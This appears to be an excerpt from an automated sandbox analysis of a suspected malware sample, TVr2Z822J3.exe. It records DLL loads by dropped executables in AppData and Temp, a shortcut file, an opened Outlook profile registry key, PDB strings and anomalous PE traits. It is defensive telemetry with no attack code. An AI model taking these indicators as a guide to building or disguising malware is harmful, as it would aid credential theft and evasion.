                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: starburn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5printsupport.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5widgets.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5network.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5widgets.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: starburn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5printsupport.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5widgets.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5network.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5widgets.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: uxtheme.dllJump to behavior
                  Source: qrdbuq.11.drLNK file: ..\..\..\..\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TVr2Z822J3.exeStatic file information: File size 11140776 > 1048576
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb33 source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362612828.00007FFB0C910000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 0000000A.00000002.1432062539.00007FFB0BA30000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1342713513.00007FFB0B12C000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 0000000A.00000002.1428560349.00007FFB09B4C000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1335709365.000001AD5F9BC000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1363124751.00007FFB1D895000.00000002.00000001.01000000.0000000D.sdmp, ActiveISO.exe, 0000000A.00000002.1432759875.00007FFB1D545000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: ntdll.pdb source: ActiveISO.exe, 00000008.00000002.1340382265.000001AD62D80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1340073961.000001AD62989000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1425546704.000002B7CEA8F000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426247184.000002B7CEE80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426767848.000002B7CF088000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962417537.0000000003BBB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964900392.00000000057BB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966623777.00000000065B7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966928847.00000000067B4000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964505621.00000000053B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962736909.0000000003FB5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963421020.00000000047BD000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963946025.0000000004DBC000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Network.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: wntdll.pdbUGP source: cmd.exe, 0000000B.00000002.1654874438.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655515118.0000000005570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: ActiveISO.exe, 00000008.00000002.1340382265.000001AD62D80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1340073961.000001AD62989000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1425546704.000002B7CEA8F000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426247184.000002B7CEE80000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1426767848.000002B7CF088000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962417537.0000000003BBB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964900392.00000000057BB000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966623777.00000000065B7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1966928847.00000000067B4000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1964505621.00000000053B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1962736909.0000000003FB5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963421020.00000000047BD000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1963946025.0000000004DBC000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: wntdll.pdb source: cmd.exe, 0000000B.00000002.1654874438.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655515118.0000000005570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: ActiveISO.exe, 00000008.00000003.1327940591.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360332952.00007FFB0BCC6000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 0000000A.00000002.1431665279.00007FFB0B9D6000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362612828.00007FFB0C910000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 0000000A.00000002.1432062539.00007FFB0BA30000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: TVr2Z822J3.exe, 00000006.00000003.1296900667.0000000000960000.00000004.00001000.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1335709365.000001AD5F9BC000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362864576.00007FFB1C261000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 0000000A.00000002.1432442405.00007FFB18B81000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1359749074.00007FFB0B5A1000.00000002.00000001.01000000.0000000A.sdmp, ActiveISO.exe, 0000000A.00000002.1430496192.00007FFB0A751000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdb source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362006100.00007FFB0C491000.00000020.00000001.01000000.00000006.sdmp, ActiveISO.exe, 0000000A.00000002.1431078979.00007FFB0A961000.00000020.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbF source: TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1342713513.00007FFB0B12C000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 0000000A.00000002.1428560349.00007FFB09B4C000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdbH source: TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1362006100.00007FFB0C491000.00000020.00000001.01000000.00000006.sdmp, ActiveISO.exe, 0000000A.00000002.1431078979.00007FFB0A961000.00000020.00000001.01000000.00000011.sdmp
                  Source: vcruntime140.dll.6.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,6_2_00406D5D
                  Source: itpyyyx.25.drStatic PE information: real checksum: 0x28ec4c should be: 0x2950af
                  Source: josveh.11.drStatic PE information: real checksum: 0x28ec4c should be: 0x2950af
                  Source: Qt5Core.dll.8.drStatic PE information: real checksum: 0x5e2d16 should be: 0x5e3f3b
                  Source: Qt5Core.dll.6.drStatic PE information: real checksum: 0x5e2d16 should be: 0x5e3f3b
                  Source: vcruntime140.dll.6.drStatic PE information: section name: _RDATA
                  Source: vcruntime140.dll.8.drStatic PE information: section name: _RDATA
                  Source: UploadAlt_Ti.exe.11.drStatic PE information: section name: Shared
                  Source: josveh.11.drStatic PE information: section name: .xdata
                  Source: josveh.11.drStatic PE information: section name: hwn
                  Source: itpyyyx.25.drStatic PE information: section name: .xdata
                  Source: itpyyyx.25.drStatic PE information: section name: hwn
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00411C20 push eax; ret 6_2_00411C4E
